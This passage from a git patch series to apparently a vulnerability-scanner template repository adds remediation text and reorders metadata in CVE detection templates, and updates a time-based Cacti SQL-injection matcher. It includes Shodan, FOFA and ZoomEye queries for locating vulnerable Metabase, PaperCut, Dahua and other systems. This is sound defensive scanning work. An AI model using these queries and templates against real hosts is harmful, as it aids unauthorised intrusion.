upload vulnerability. reference: - https://github.com/qiuhuihk/cve/blob/main/upload.md - https://nvd.nist.gov/vuln/detail/CVE-2023-3836 @@ -17,15 +19,15 @@ info: cve-id: CVE-2023-3836 cwe-id: CWE-434 epss-score: 0.04304 - cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* epss-percentile: 0.91215 + cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: html:"/WPMS/asset" verified: true - zoomeye-query: /WPMS/asset + max-request: 2 vendor: dahuasecurity product: smart_parking_management + shodan-query: html:"/WPMS/asset" + zoomeye-query: /WPMS/asset tags: cve,cve2023,dahua,fileupload,intrusive,rce variables: random_str: "{{rand_base(6)}}" diff --git a/http/cves/2023/CVE-2023-38646.yaml b/http/cves/2023/CVE-2023-38646.yaml index 5579c78d4b..fe6379c9e0 100644 --- a/http/cves/2023/CVE-2023-38646.yaml +++ b/http/cves/2023/CVE-2023-38646.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2. + remediation: | + Upgrade Metabase to version 0.46.6.1 or later to mitigate this vulnerability. reference: - https://www.metabase.com/blog/security-advisory - https://github.com/metabase/metabase/releases/tag/v0.46.6.1 @@ -18,15 +20,15 @@ info: cvss-score: 9.8 cve-id: CVE-2023-38646 epss-score: 0.54087 - cpe: cpe:2.3:a:metabase:metabase:*:*:*:*:-:*:*:* epss-percentile: 0.97174 + cpe: cpe:2.3:a:metabase:metabase:*:*:*:*:-:*:*:* metadata: - shodan-query: http.title:"Metabase" - fofa-query: app="Metabase" verified: true max-request: 2 vendor: metabase product: metabase + shodan-query: http.title:"Metabase" + fofa-query: app="Metabase" tags: cve,cve2023,metabase,oss,rce variables: file: "./plugins/vertica.metabase-driver.jar" diff --git a/http/cves/2023/CVE-2023-39026.yaml b/http/cves/2023/CVE-2023-39026.yaml index 63f18ee8ca..da9a7514ac 100644 --- a/http/cves/2023/CVE-2023-39026.yaml +++ b/http/cves/2023/CVE-2023-39026.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in FileMage Gateway. reference: - https://raindayzz.com/technicalblog/2023/08/20/FileMage-Vulnerability.html - https://securityonline.info/cve-2023-39026-filemage-gateway-directory-traversal-vulnerability/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2023-39026 cwe-id: CWE-22 epss-score: 0.01308 - cpe: cpe:2.3:a:filemage:filemage:*:*:*:*:*:*:*:* epss-percentile: 0.84224 + cpe: cpe:2.3:a:filemage:filemage:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: title:"FileMage" + max-request: 1 vendor: filemage product: filemage + shodan-query: title:"FileMage" tags: cve,cve2023,lfi,filemage http: diff --git a/http/cves/2023/CVE-2023-39120.yaml b/http/cves/2023/CVE-2023-39120.yaml index d3e5e67844..aa08469889 100644 --- a/http/cves/2023/CVE-2023-39120.yaml +++ b/http/cves/2023/CVE-2023-39120.yaml @@ -6,12 +6,12 @@ info: severity: high description: | Nodogsplash product was affected by a directory traversal vulnerability that also impacted the OpenWrt product. This vulnerability was addressed in Nodogsplash version 5.0.1. Exploiting this vulnerability, remote attackers could read arbitrary files from the target system. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-39120 - https://github.com/nodogsplash/nodogsplash/commit/a745a5d635925d2a6f0e0530bdc0eac645b672ed - https://gist.github.com/numanturle/55cb758bacc4930a081e79c2a6a769b6 - https://github.com/openwrt/routing/pull/997 - remediation: Apply all relevant security patches and product upgrades. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 diff --git a/http/cves/2023/CVE-2023-39141.yaml b/http/cves/2023/CVE-2023-39141.yaml index a54e82234b..f3eb0f6d0a 100644 --- a/http/cves/2023/CVE-2023-39141.yaml +++ b/http/cves/2023/CVE-2023-39141.yaml @@ -6,6 +6,8 @@ info: severity: high description: | webui-aria2 commit 4fe2e was discovered to contain a path traversal vulnerability. + remediation: | + Upgrade to the latest version of Aria2 WebUI to fix the path traversal vulnerability. reference: - https://twitter.com/win3zz/status/1694239332465520684 - https://gist.github.com/JafarAkhondali/528fe6c548b78f454911fb866b23f66e @@ -16,14 +18,14 @@ info: cve-id: CVE-2023-39141 cwe-id: CWE-22 epss-score: 0.00491 - cpe: cpe:2.3:a:ziahamza:webui-aria2:-:*:*:*:*:*:*:* epss-percentile: 0.73119 + cpe: cpe:2.3:a:ziahamza:webui-aria2:-:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: title:"Aria2 WebUI" verified: true + max-request: 2 vendor: ziahamza product: webui-aria2 + shodan-query: title:"Aria2 WebUI" tags: lfi,unauth,aria2,webui http: diff --git a/http/cves/2023/CVE-2023-39143.yaml b/http/cves/2023/CVE-2023-39143.yaml index 1a84daed2f..fcebd250d2 100644 --- a/http/cves/2023/CVE-2023-39143.yaml +++ b/http/cves/2023/CVE-2023-39143.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: critical description: PaperCut NG and PaperCut MF before 22.1.3 are vulnerable to path traversal which enables attackers to read, delete, and upload arbitrary files. + remediation: | + Upgrade PaperCut to version 22.1.3 or later to mitigate the vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-39143 - https://www.horizon3.ai/cve-2023-39143-papercut-path-traversal-file-upload-rce-vulnerability/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2023-39143 cwe-id: CWE-22 epss-score: 0.92137 - cpe: cpe:2.3:a:papercut:papercut_mf:*:*:*:*:*:*:*:* epss-percentile: 0.98563 + cpe: cpe:2.3:a:papercut:papercut_mf:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: html:"content="PaperCut"" + max-request: 1 vendor: papercut product: papercut_mf + shodan-query: html:"content="PaperCut"" tags: cve,cve2023,lfi,papercut http: diff --git a/http/cves/2023/CVE-2023-3936.yaml b/http/cves/2023/CVE-2023-3936.yaml index f9aa86a618..8857a4662c 100644 --- a/http/cves/2023/CVE-2023-3936.yaml +++ b/http/cves/2023/CVE-2023-3936.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The Blog2Social WordPress plugin before 7.2.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin + remediation: | + Update to the latest version of the Blog2Social plugin (7.2.1) or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/6d09a5d3-046d-47ef-86b4-c024ea09dc0f - https://nvd.nist.gov/vuln/detail/CVE-2023-3936 @@ -15,14 +17,14 @@ info: cve-id: CVE-2023-3936 cwe-id: CWE-79 epss-score: 0.00071 - cpe: cpe:2.3:a:adenion:blog2social:*:*:*:*:*:wordpress:*:* epss-percentile: 0.29286 + cpe: cpe:2.3:a:adenion:blog2social:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: adenion product: blog2social + framework: wordpress tags: wpscan,cve,cve2023,wordpress,wp-plugin,xss,authenticated http: diff --git a/http/cves/2023/CVE-2023-4173.yaml b/http/cves/2023/CVE-2023-4173.yaml index 516ada97b8..045b97d614 100644 --- a/http/cves/2023/CVE-2023-4173.yaml +++ b/http/cves/2023/CVE-2023-4173.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index. + remediation: | + Apply the latest patch or upgrade to a newer version of mooSocial to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/51670 - https://nvd.nist.gov/vuln/detail/CVE-2023-4173 @@ -18,14 +20,14 @@ info: cve-id: CVE-2023-4173 cwe-id: CWE-79 epss-score: 0.00176 - cpe: cpe:2.3:a:moosocial:moostore:3.1.6:*:*:*:*:*:*:* epss-percentile: 0.54027 + cpe: cpe:2.3:a:moosocial:moostore:3.1.6:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - fofa-query: mooSocial + max-request: 1 vendor: moosocial product: moostore + fofa-query: mooSocial tags: packetstorm,cve,cve2023,moosocial,xss http: diff --git a/http/cves/2023/CVE-2023-4174.yaml b/http/cves/2023/CVE-2023-4174.yaml index 3d53c5ecba..93703388d3 100644 --- a/http/cves/2023/CVE-2023-4174.yaml +++ b/http/cves/2023/CVE-2023-4174.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely. + remediation: | + Upgrade to the latest version of mooSocial or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://www.exploit-db.com/exploits/51671 - https://nvd.nist.gov/vuln/detail/CVE-2023-4174 @@ -18,14 +20,14 @@ info: cve-id: CVE-2023-4174 cwe-id: CWE-79 epss-score: 0.00209 - cpe: cpe:2.3:a:moosocial:moostore:3.1.6:*:*:*:*:*:*:* epss-percentile: 0.58186 + cpe: cpe:2.3:a:moosocial:moostore:3.1.6:*:*:*:*:*:*:* metadata: - max-request: 5 verified: true - fofa-query: icon_hash="702863115" + max-request: 5 vendor: moosocial product: moostore + fofa-query: icon_hash="702863115" tags: packetstorm,cve,cve2023,moosocial,xss http: diff --git a/http/cves/2023/CVE-2023-4634.yaml b/http/cves/2023/CVE-2023-4634.yaml index 59eb930a09..0ac4ef7924 100644 --- a/http/cves/2023/CVE-2023-4634.yaml +++ b/http/cves/2023/CVE-2023-4634.yaml @@ -14,8 +14,8 @@ info: classification: cve-id: CVE-2023-4634 metadata: - max-request: 2 verified: true + max-request: 2 publicwww-query: "wp-content/plugins/media-library-assistant" tags: cve,cve2023,wordpress,wp,wp-plugin,lfi,rce,media-library-assistant From 469b7f70496b454554cdcb2cffefbb544eb80b6b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 6 Sep 2023 17:17:28 +0530 Subject: [PATCH 0187/1090] matchers update --- http/cves/2023/CVE-2023-39361.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-39361.yaml b/http/cves/2023/CVE-2023-39361.yaml index 8199f53e40..b41347b210 100644 --- a/http/cves/2023/CVE-2023-39361.yaml +++ b/http/cves/2023/CVE-2023-39361.yaml @@ -11,9 +11,12 @@ info: - https://cve.report/CVE-2023-4634 classification: cve-id: CVE-2023-39361 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cwe-id: CWE-89 metadata: max-request: 1 -# verified: true + verified: true shodan-query: title:"Login to Cacti" tags: cve,cve2023,cacti,sqli @@ -29,5 +32,5 @@ http: dsl: - 'duration>=10' - 'status_code == 200' -# - 'contains(body, "cactiAction=")' + - 'contains_all(body, "var treeView=", "cacti")' condition: and From 449651f0764e88f9beb1d5d058b6a31041e3f854 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 6 Sep 2023 17:29:08 +0530 Subject: [PATCH 0188/1090] updated 2022 CVEs --- http/cves/2022/CVE-2022-0140.yaml | 6 ++- http/cves/2022/CVE-2022-0147.yaml | 8 ++-- http/cves/2022/CVE-2022-0148.yaml | 6 ++- http/cves/2022/CVE-2022-0149.yaml | 6 ++- http/cves/2022/CVE-2022-0150.yaml | 6 ++- http/cves/2022/CVE-2022-0165.yaml | 6 ++- http/cves/2022/CVE-2022-0169.yaml | 10 ++-- http/cves/2022/CVE-2022-0189.yaml | 6 ++- http/cves/2022/CVE-2022-0201.yaml | 6 ++- http/cves/2022/CVE-2022-0206.yaml | 8 ++-- http/cves/2022/CVE-2022-0208.yaml | 6 ++- http/cves/2022/CVE-2022-0212.yaml | 8 ++-- http/cves/2022/CVE-2022-0218.yaml | 6 ++- http/cves/2022/CVE-2022-0220.yaml | 6 +-- http/cves/2022/CVE-2022-0234.yaml | 10 ++-- http/cves/2022/CVE-2022-0271.yaml | 6 ++- http/cves/2022/CVE-2022-0281.yaml | 6 ++- http/cves/2022/CVE-2022-0288.yaml | 6 +-- http/cves/2022/CVE-2022-0346.yaml | 8 ++-- http/cves/2022/CVE-2022-0349.yaml | 8 ++-- http/cves/2022/CVE-2022-0378.yaml | 6 ++- http/cves/2022/CVE-2022-0381.yaml | 6 ++- http/cves/2022/CVE-2022-0412.yaml | 8 ++-- http/cves/2022/CVE-2022-0415.yaml | 6 +-- http/cves/2022/CVE-2022-0422.yaml | 6 ++- http/cves/2022/CVE-2022-0432.yaml | 4 +- http/cves/2022/CVE-2022-0434.yaml | 8 ++-- http/cves/2022/CVE-2022-0437.yaml | 6 ++- http/cves/2022/CVE-2022-0441.yaml | 8 ++-- http/cves/2022/CVE-2022-0482.yaml | 6 ++- http/cves/2022/CVE-2022-0535.yaml | 8 ++-- http/cves/2022/CVE-2022-0540.yaml | 6 +-- http/cves/2022/CVE-2022-0591.yaml | 10 ++-- http/cves/2022/CVE-2022-0594.yaml | 8 ++-- http/cves/2022/CVE-2022-0595.yaml | 6 ++- http/cves/2022/CVE-2022-0599.yaml | 6 ++- http/cves/2022/CVE-2022-0653.yaml | 6 +-- http/cves/2022/CVE-2022-0656.yaml | 8 ++-- http/cves/2022/CVE-2022-0660.yaml | 6 ++- http/cves/2022/CVE-2022-0678.yaml | 8 ++-- http/cves/2022/CVE-2022-0679.yaml | 8 ++-- http/cves/2022/CVE-2022-0692.yaml | 4 +- http/cves/2022/CVE-2022-0693.yaml | 8 ++-- http/cves/2022/CVE-2022-0735.yaml | 6 ++- http/cves/2022/CVE-2022-0747.yaml | 8 ++-- http/cves/2022/CVE-2022-0760.yaml | 8 ++-- http/cves/2022/CVE-2022-0769.yaml | 8 ++-- http/cves/2022/CVE-2022-0773.yaml | 8 ++-- http/cves/2022/CVE-2022-0776.yaml | 6 ++- http/cves/2022/CVE-2022-0781.yaml | 8 ++-- http/cves/2022/CVE-2022-0784.yaml | 8 ++-- http/cves/2022/CVE-2022-0785.yaml | 8 ++-- http/cves/2022/CVE-2022-0786.yaml | 8 ++-- http/cves/2022/CVE-2022-0788.yaml | 8 ++-- http/cves/2022/CVE-2022-0817.yaml | 8 ++-- http/cves/2022/CVE-2022-0824.yaml | 4 +- http/cves/2022/CVE-2022-0826.yaml | 8 ++-- http/cves/2022/CVE-2022-0827.yaml | 8 ++-- http/cves/2022/CVE-2022-0846.yaml | 8 ++-- http/cves/2022/CVE-2022-0864.yaml | 8 ++-- http/cves/2022/CVE-2022-0867.yaml | 8 ++-- http/cves/2022/CVE-2022-0869.yaml | 4 +- http/cves/2022/CVE-2022-0870.yaml | 6 +-- http/cves/2022/CVE-2022-0885.yaml | 8 ++-- http/cves/2022/CVE-2022-0928.yaml | 6 ++- http/cves/2022/CVE-2022-0948.yaml | 8 ++-- http/cves/2022/CVE-2022-0949.yaml | 8 ++-- http/cves/2022/CVE-2022-0952.yaml | 8 ++-- http/cves/2022/CVE-2022-0954.yaml | 6 ++- http/cves/2022/CVE-2022-0963.yaml | 6 ++- http/cves/2022/CVE-2022-0968.yaml | 4 +- http/cves/2022/CVE-2022-1007.yaml | 8 ++-- http/cves/2022/CVE-2022-1013.yaml | 8 ++-- http/cves/2022/CVE-2022-1020.yaml | 6 ++- http/cves/2022/CVE-2022-1040.yaml | 8 ++-- http/cves/2022/CVE-2022-1054.yaml | 6 ++- http/cves/2022/CVE-2022-1057.yaml | 8 ++-- http/cves/2022/CVE-2022-1058.yaml | 8 ++-- http/cves/2022/CVE-2022-1119.yaml | 6 ++- http/cves/2022/CVE-2022-1162.yaml | 6 +-- http/cves/2022/CVE-2022-1168.yaml | 10 ++-- http/cves/2022/CVE-2022-1221.yaml | 8 ++-- http/cves/2022/CVE-2022-1329.yaml | 8 ++-- http/cves/2022/CVE-2022-1386.yaml | 6 ++- http/cves/2022/CVE-2022-1388.yaml | 8 ++-- http/cves/2022/CVE-2022-1390.yaml | 6 ++- http/cves/2022/CVE-2022-1391.yaml | 6 ++- http/cves/2022/CVE-2022-1392.yaml | 8 ++-- http/cves/2022/CVE-2022-1398.yaml | 8 ++-- http/cves/2022/CVE-2022-1439.yaml | 6 ++- http/cves/2022/CVE-2022-1442.yaml | 10 ++-- http/cves/2022/CVE-2022-1574.yaml | 8 ++-- http/cves/2022/CVE-2022-1595.yaml | 8 ++-- http/cves/2022/CVE-2022-1597.yaml | 10 ++-- http/cves/2022/CVE-2022-1598.yaml | 10 ++-- http/cves/2022/CVE-2022-1609.yaml | 4 +- http/cves/2022/CVE-2022-1713.yaml | 8 ++-- http/cves/2022/CVE-2022-1724.yaml | 8 ++-- http/cves/2022/CVE-2022-1756.yaml | 8 ++-- http/cves/2022/CVE-2022-1768.yaml | 8 ++-- http/cves/2022/CVE-2022-1815.yaml | 6 ++- http/cves/2022/CVE-2022-1883.yaml | 4 +- http/cves/2022/CVE-2022-1903.yaml | 8 ++-- http/cves/2022/CVE-2022-1904.yaml | 8 ++-- http/cves/2022/CVE-2022-1906.yaml | 10 ++-- http/cves/2022/CVE-2022-1910.yaml | 8 ++-- http/cves/2022/CVE-2022-1916.yaml | 6 ++- http/cves/2022/CVE-2022-1933.yaml | 8 ++-- http/cves/2022/CVE-2022-1937.yaml | 8 ++-- http/cves/2022/CVE-2022-1946.yaml | 10 ++-- http/cves/2022/CVE-2022-1952.yaml | 8 ++-- http/cves/2022/CVE-2022-2034.yaml | 8 ++-- http/cves/2022/CVE-2022-21371.yaml | 4 +- http/cves/2022/CVE-2022-21500.yaml | 8 ++-- http/cves/2022/CVE-2022-21587.yaml | 4 +- http/cves/2022/CVE-2022-21661.yaml | 6 +-- http/cves/2022/CVE-2022-21705.yaml | 8 ++-- http/cves/2022/CVE-2022-2185.yaml | 6 ++- http/cves/2022/CVE-2022-2187.yaml | 6 ++- http/cves/2022/CVE-2022-2219.yaml | 8 ++-- http/cves/2022/CVE-2022-22242.yaml | 8 ++-- http/cves/2022/CVE-2022-22536.yaml | 6 ++- http/cves/2022/CVE-2022-22733.yaml | 8 ++-- http/cves/2022/CVE-2022-22897.yaml | 10 ++-- http/cves/2022/CVE-2022-2290.yaml | 8 ++-- http/cves/2022/CVE-2022-22947.yaml | 4 +- http/cves/2022/CVE-2022-22954.yaml | 6 ++- http/cves/2022/CVE-2022-22963.yaml | 4 +- http/cves/2022/CVE-2022-22965.yaml | 4 +- http/cves/2022/CVE-2022-22972.yaml | 6 ++- http/cves/2022/CVE-2022-23102.yaml | 6 ++- http/cves/2022/CVE-2022-23131.yaml | 8 ++-- http/cves/2022/CVE-2022-23134.yaml | 4 +- http/cves/2022/CVE-2022-2314.yaml | 8 ++-- http/cves/2022/CVE-2022-23178.yaml | 4 +- http/cves/2022/CVE-2022-23347.yaml | 8 ++-- http/cves/2022/CVE-2022-23348.yaml | 8 ++-- http/cves/2022/CVE-2022-23544.yaml | 10 ++-- http/cves/2022/CVE-2022-2373.yaml | 8 ++-- http/cves/2022/CVE-2022-2376.yaml | 6 +-- http/cves/2022/CVE-2022-23779.yaml | 6 ++- http/cves/2022/CVE-2022-2379.yaml | 8 ++-- http/cves/2022/CVE-2022-23808.yaml | 8 ++-- http/cves/2022/CVE-2022-2383.yaml | 8 ++-- http/cves/2022/CVE-2022-23854.yaml | 8 ++-- http/cves/2022/CVE-2022-23881.yaml | 4 +- http/cves/2022/CVE-2022-23898.yaml | 10 ++-- http/cves/2022/CVE-2022-23944.yaml | 4 +- http/cves/2022/CVE-2022-24112.yaml | 8 ++-- http/cves/2022/CVE-2022-24124.yaml | 6 ++- http/cves/2022/CVE-2022-24129.yaml | 6 ++- http/cves/2022/CVE-2022-2414.yaml | 10 ++-- http/cves/2022/CVE-2022-24181.yaml | 6 ++- http/cves/2022/CVE-2022-24223.yaml | 6 +-- http/cves/2022/CVE-2022-24260.yaml | 6 ++- http/cves/2022/CVE-2022-24264.yaml | 6 ++- http/cves/2022/CVE-2022-24265.yaml | 6 ++- http/cves/2022/CVE-2022-24266.yaml | 6 ++- http/cves/2022/CVE-2022-24288.yaml | 8 ++-- http/cves/2022/CVE-2022-24384.yaml | 8 ++-- http/cves/2022/CVE-2022-2462.yaml | 6 ++- http/cves/2022/CVE-2022-2467.yaml | 6 ++- http/cves/2022/CVE-2022-24681.yaml | 4 +- http/cves/2022/CVE-2022-24716.yaml | 6 +-- http/cves/2022/CVE-2022-24816.yaml | 10 ++-- http/cves/2022/CVE-2022-24856.yaml | 6 +-- http/cves/2022/CVE-2022-2486.yaml | 8 ++-- http/cves/2022/CVE-2022-2487.yaml | 8 ++-- http/cves/2022/CVE-2022-2488.yaml | 8 ++-- http/cves/2022/CVE-2022-24899.yaml | 6 +-- http/cves/2022/CVE-2022-24900.yaml | 4 +- http/cves/2022/CVE-2022-24990.yaml | 6 ++- http/cves/2022/CVE-2022-25082.yaml | 4 +- http/cves/2022/CVE-2022-25125.yaml | 10 ++-- http/cves/2022/CVE-2022-25216.yaml | 4 +- http/cves/2022/CVE-2022-25323.yaml | 4 +- http/cves/2022/CVE-2022-25356.yaml | 8 ++-- http/cves/2022/CVE-2022-25369.yaml | 2 +- http/cves/2022/CVE-2022-2544.yaml | 8 ++-- http/cves/2022/CVE-2022-2546.yaml | 8 ++-- http/cves/2022/CVE-2022-25481.yaml | 8 ++-- http/cves/2022/CVE-2022-25485.yaml | 6 ++- http/cves/2022/CVE-2022-25486.yaml | 6 ++- http/cves/2022/CVE-2022-25487.yaml | 6 +-- http/cves/2022/CVE-2022-25488.yaml | 6 +-- http/cves/2022/CVE-2022-25489.yaml | 6 +-- http/cves/2022/CVE-2022-25497.yaml | 6 ++- http/cves/2022/CVE-2022-2551.yaml | 10 ++-- http/cves/2022/CVE-2022-2599.yaml | 8 ++-- http/cves/2022/CVE-2022-26134.yaml | 8 ++-- http/cves/2022/CVE-2022-26138.yaml | 6 ++- http/cves/2022/CVE-2022-26148.yaml | 8 ++-- http/cves/2022/CVE-2022-26159.yaml | 4 +- http/cves/2022/CVE-2022-26233.yaml | 4 +- http/cves/2022/CVE-2022-26263.yaml | 6 ++- http/cves/2022/CVE-2022-2627.yaml | 8 ++-- http/cves/2022/CVE-2022-2633.yaml | 8 ++-- http/cves/2022/CVE-2022-26352.yaml | 4 +- http/cves/2022/CVE-2022-26564.yaml | 6 ++- http/cves/2022/CVE-2022-26833.yaml | 4 +- http/cves/2022/CVE-2022-26960.yaml | 6 ++- http/cves/2022/CVE-2022-2733.yaml | 8 ++-- http/cves/2022/CVE-2022-2756.yaml | 8 ++-- http/cves/2022/CVE-2022-27593.yaml | 8 ++-- http/cves/2022/CVE-2022-27849.yaml | 8 ++-- http/cves/2022/CVE-2022-27926.yaml | 6 ++- http/cves/2022/CVE-2022-27927.yaml | 6 ++- http/cves/2022/CVE-2022-27984.yaml | 6 ++- http/cves/2022/CVE-2022-27985.yaml | 6 ++- http/cves/2022/CVE-2022-28022.yaml | 6 ++- http/cves/2022/CVE-2022-28023.yaml | 6 ++- http/cves/2022/CVE-2022-28032.yaml | 6 +-- http/cves/2022/CVE-2022-28079.yaml | 6 ++- http/cves/2022/CVE-2022-28080.yaml | 4 +- http/cves/2022/CVE-2022-28117.yaml | 6 ++- http/cves/2022/CVE-2022-28219.yaml | 12 ++--- http/cves/2022/CVE-2022-28290.yaml | 6 ++- http/cves/2022/CVE-2022-28363.yaml | 4 +- http/cves/2022/CVE-2022-28365.yaml | 4 +- http/cves/2022/CVE-2022-2863.yaml | 6 +-- http/cves/2022/CVE-2022-28923.yaml | 8 ++-- http/cves/2022/CVE-2022-28955.yaml | 8 ++-- http/cves/2022/CVE-2022-29004.yaml | 6 ++- http/cves/2022/CVE-2022-29005.yaml | 6 ++- http/cves/2022/CVE-2022-29006.yaml | 6 ++- http/cves/2022/CVE-2022-29007.yaml | 6 ++- http/cves/2022/CVE-2022-29009.yaml | 6 ++- http/cves/2022/CVE-2022-29014.yaml | 4 +- http/cves/2022/CVE-2022-29078.yaml | 6 ++- http/cves/2022/CVE-2022-29153.yaml | 8 ++-- http/cves/2022/CVE-2022-29272.yaml | 4 +- http/cves/2022/CVE-2022-29298.yaml | 8 ++-- http/cves/2022/CVE-2022-29299.yaml | 4 +- http/cves/2022/CVE-2022-29301.yaml | 4 +- http/cves/2022/CVE-2022-29303.yaml | 8 ++-- http/cves/2022/CVE-2022-29349.yaml | 8 ++-- http/cves/2022/CVE-2022-29383.yaml | 6 ++- http/cves/2022/CVE-2022-29455.yaml | 8 ++-- http/cves/2022/CVE-2022-29464.yaml | 6 ++- http/cves/2022/CVE-2022-29548.yaml | 8 ++-- http/cves/2022/CVE-2022-29775.yaml | 8 ++-- http/cves/2022/CVE-2022-30073.yaml | 6 ++- http/cves/2022/CVE-2022-30489.yaml | 8 ++-- http/cves/2022/CVE-2022-30512.yaml | 6 ++- http/cves/2022/CVE-2022-30513.yaml | 6 ++- http/cves/2022/CVE-2022-30514.yaml | 6 ++- http/cves/2022/CVE-2022-30525.yaml | 6 ++- http/cves/2022/CVE-2022-3062.yaml | 8 ++-- http/cves/2022/CVE-2022-30776.yaml | 8 ++-- http/cves/2022/CVE-2022-30777.yaml | 8 ++-- http/cves/2022/CVE-2022-31126.yaml | 8 ++-- http/cves/2022/CVE-2022-31268.yaml | 8 ++-- http/cves/2022/CVE-2022-31269.yaml | 8 ++-- http/cves/2022/CVE-2022-31299.yaml | 6 ++- http/cves/2022/CVE-2022-31373.yaml | 8 ++-- http/cves/2022/CVE-2022-31474.yaml | 6 +-- http/cves/2022/CVE-2022-31499.yaml | 8 ++-- http/cves/2022/CVE-2022-31656.yaml | 8 ++-- http/cves/2022/CVE-2022-31798.yaml | 8 ++-- http/cves/2022/CVE-2022-31814.yaml | 8 ++-- http/cves/2022/CVE-2022-31845.yaml | 8 ++-- http/cves/2022/CVE-2022-31846.yaml | 8 ++-- http/cves/2022/CVE-2022-31847.yaml | 8 ++-- http/cves/2022/CVE-2022-31854.yaml | 6 ++- http/cves/2022/CVE-2022-31879.yaml | 6 ++- http/cves/2022/CVE-2022-31974.yaml | 6 ++- http/cves/2022/CVE-2022-31975.yaml | 6 ++- http/cves/2022/CVE-2022-31976.yaml | 6 ++- http/cves/2022/CVE-2022-31977.yaml | 6 ++- http/cves/2022/CVE-2022-31978.yaml | 6 ++- http/cves/2022/CVE-2022-31980.yaml | 6 ++- http/cves/2022/CVE-2022-31981.yaml | 6 ++- http/cves/2022/CVE-2022-31982.yaml | 6 ++- http/cves/2022/CVE-2022-31983.yaml | 6 ++- http/cves/2022/CVE-2022-31984.yaml | 6 ++- http/cves/2022/CVE-2022-32007.yaml | 6 ++- http/cves/2022/CVE-2022-32015.yaml | 6 ++- http/cves/2022/CVE-2022-32018.yaml | 6 ++- http/cves/2022/CVE-2022-32022.yaml | 8 ++-- http/cves/2022/CVE-2022-32024.yaml | 10 ++-- http/cves/2022/CVE-2022-32025.yaml | 10 ++-- http/cves/2022/CVE-2022-32026.yaml | 10 ++-- http/cves/2022/CVE-2022-32028.yaml | 10 ++-- http/cves/2022/CVE-2022-32094.yaml | 8 ++-- http/cves/2022/CVE-2022-32195.yaml | 10 ++-- http/cves/2022/CVE-2022-32409.yaml | 8 ++-- http/cves/2022/CVE-2022-32429.yaml | 8 ++-- http/cves/2022/CVE-2022-32444.yaml | 4 +- http/cves/2022/CVE-2022-32770.yaml | 8 ++-- http/cves/2022/CVE-2022-32771.yaml | 8 ++-- http/cves/2022/CVE-2022-32772.yaml | 8 ++-- http/cves/2022/CVE-2022-33119.yaml | 8 ++-- http/cves/2022/CVE-2022-33174.yaml | 8 ++-- http/cves/2022/CVE-2022-33891.yaml | 8 ++-- http/cves/2022/CVE-2022-33901.yaml | 8 ++-- http/cves/2022/CVE-2022-33965.yaml | 10 ++-- http/cves/2022/CVE-2022-34045.yaml | 8 ++-- http/cves/2022/CVE-2022-34046.yaml | 8 ++-- http/cves/2022/CVE-2022-34047.yaml | 8 ++-- http/cves/2022/CVE-2022-34048.yaml | 8 ++-- http/cves/2022/CVE-2022-34049.yaml | 8 ++-- http/cves/2022/CVE-2022-34121.yaml | 6 ++- http/cves/2022/CVE-2022-34328.yaml | 8 ++-- http/cves/2022/CVE-2022-34576.yaml | 8 ++-- http/cves/2022/CVE-2022-34590.yaml | 8 ++-- http/cves/2022/CVE-2022-34753.yaml | 6 ++- http/cves/2022/CVE-2022-3484.yaml | 10 ++-- http/cves/2022/CVE-2022-3506.yaml | 8 ++-- http/cves/2022/CVE-2022-35151.yaml | 8 ++-- http/cves/2022/CVE-2022-35405.yaml | 6 ++- http/cves/2022/CVE-2022-35413.yaml | 8 ++-- http/cves/2022/CVE-2022-35416.yaml | 8 ++-- http/cves/2022/CVE-2022-35493.yaml | 8 ++-- http/cves/2022/CVE-2022-3578.yaml | 8 ++-- http/cves/2022/CVE-2022-35914.yaml | 8 ++-- http/cves/2022/CVE-2022-36446.yaml | 6 ++- http/cves/2022/CVE-2022-36537.yaml | 8 ++-- http/cves/2022/CVE-2022-36642.yaml | 8 ++-- http/cves/2022/CVE-2022-36804.yaml | 6 ++- http/cves/2022/CVE-2022-36883.yaml | 10 ++-- 